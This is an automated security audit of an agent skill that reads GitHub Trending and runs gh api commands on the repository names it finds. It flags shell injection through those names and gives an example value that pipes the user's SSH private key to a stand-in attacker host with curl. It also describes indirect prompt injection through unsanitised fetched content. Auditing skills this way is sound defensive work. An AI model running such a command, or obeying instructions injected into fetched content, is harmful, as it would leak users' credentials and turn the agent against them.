GitHub Trending

Fail

Audited by Gen Agent Trust Hub on May 9, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill instructs the agent to execute shell commands constructed with data from an external, untrusted source. In Step 2, the agent is told to run gh api "repos/OWNER/REPO" --jq '{created_at, stargazers_count, pushed_at}' for repositories identified in Step 1. Because the OWNER/REPO values are extracted from the public GitHub Trending page, an attacker could name a repository using shell injection sequences (e.g., $(touch pwned) or ; curl attacker.com/leak?d=$(cat ~/.ssh/id_rsa)) to execute arbitrary commands when the agent processes the trending list.
  • [PROMPT_INJECTION]: The skill ingests and summarizes content from an external source (GitHub) without sanitization or boundary markers, making it vulnerable to indirect prompt injection.
  • Ingestion points: WebFetch from https://github.com/trending and gh api responses (SKILL.md).
  • Boundary markers: Absent. The instructions do not provide delimiters or warnings to ignore instructions within the fetched repository metadata.
  • Capability inventory: WebFetch (read), gh api (execution with auth), ./notify (write), and file system access to memory/logs/ and soul/ directories.
  • Sanitization: Absent. There is no requirement for the agent to validate or escape strings before using them in commands or final outputs.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: May 9, 2026, 03:14 PM